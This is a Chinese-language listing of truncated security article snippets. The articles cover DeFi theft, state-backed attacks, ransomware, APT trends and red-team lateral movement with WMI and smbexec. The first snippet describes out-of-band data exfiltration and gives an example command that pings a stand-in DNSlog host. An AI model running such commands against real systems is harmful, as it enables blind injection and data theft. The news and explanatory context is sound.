数据外带类类型描述攻击方在对一个目标进行攻击时,会有一些漏洞探测的动作。当遇到没有回显的命令执行和注入时,会采用结合dnslog的方式。命令执行:ping xx.dnslog.comSQL注入 :lo...
Akropolis遭到闪电贷攻击 损失200万美元DAI代币
E安全11月17日 据外媒报道,近日,加密货币借贷服务Akropolis表示,一名黑客对其平台进行了“闪贷”攻击,偷走了价值约200万美元的Dai加密货币。Akropolis是DeFi借贷...
【安全圈】微软称 COVID-19 疫苗制造商遭到了境外黑客攻击
外媒报道称,疑似受到俄朝支持的黑客,已将参与 COVID-19 疫苗研发的制造公司视作攻击目标。科技巨头微软周五表示,其发现了针对美国、加拿大、法国、印度、韩国七家企业的此类攻击。遗憾的是,尽管其已设...
IoT成为勒索软件攻击的新突破口
作者 | 天地和兴工业网络安全研究院【编者按】随着越来越多的企业依靠物联网设备来采集数据,物联网设备为黑客提供了进入企业网络的通道。制造商为每个物联网设备创建的应用程序种类繁多,黑客可以进入...
微软称COVID-19疫苗制造商遭到了境外机构支持的黑客攻击
更多全球网络安全资讯尽在邑安全外媒报道称,疑似受到俄朝支持的黑客,已将参与 COVID-19 疫苗研发的制造公司视作攻击目标。科技巨头微软周五表示,其发现了针对美国、加拿大、法国、印度、韩国七家企业的...
pay2key溯源:伊朗黑客
上周,checkpoint研究人员发布了关于新出现的勒索软件 Pay2Key 攻击的预警信息。随后,研究人员进行了进一步调查,发现勒索软件攻击的目标主要是以色列公司。勒索软件会在受害者网络中快速传播,...
2020年第三季度APT攻击趋势分析(上)
三年多来,卡巴斯基全球研究与分析团队(GReAT)一直在持续关注着APT攻击活动的变化,并且每个季度都发布相关的趋势报告分析。本文所讲的分析都是基于卡巴斯基的网络攻击情报研究。本文重点介绍了卡巴斯基在...
防勒索软件最关键指标:驻留时间
点击蓝字关注我们勒索软件是企业当今面临的最普遍、最隐蔽、最危险的安全威胁之一。仅在2020年,从本田、佳能、佳明(Garmin)到Jack Daniels的数十个知名品牌遭遇了勒索软件团伙的洗劫,支付...
SPACE RACE攻击行动
NO.1 【简介】2020年5月初,Telsy分析了一些针对航空航天和航空电子领域的攻击活动,攻击者通过流行的职场社交网络LinkedIn对个人进行社会工程学攻击。根据Telsy研究人员的观测,该攻击...
横向移动 - WMI 的使用
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是 渗透攻击红队 的第 28 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更WMI自从 PsEx...
横向移动 - smbexec 的使用
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是 渗透攻击红队 的第 29 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更smbexecsmb...
“战争行为”条款可拒赔网络保险
六名俄罗斯军人因NotPetya勒索软件攻击遭起诉,企业由此意识到网络保险并非“消灾免难卡”。网络安全与保险专家表示,如果保险公司运用十分普遍的“战争行为”条款成功规避自身责任,公司企业想要靠业务中断...
79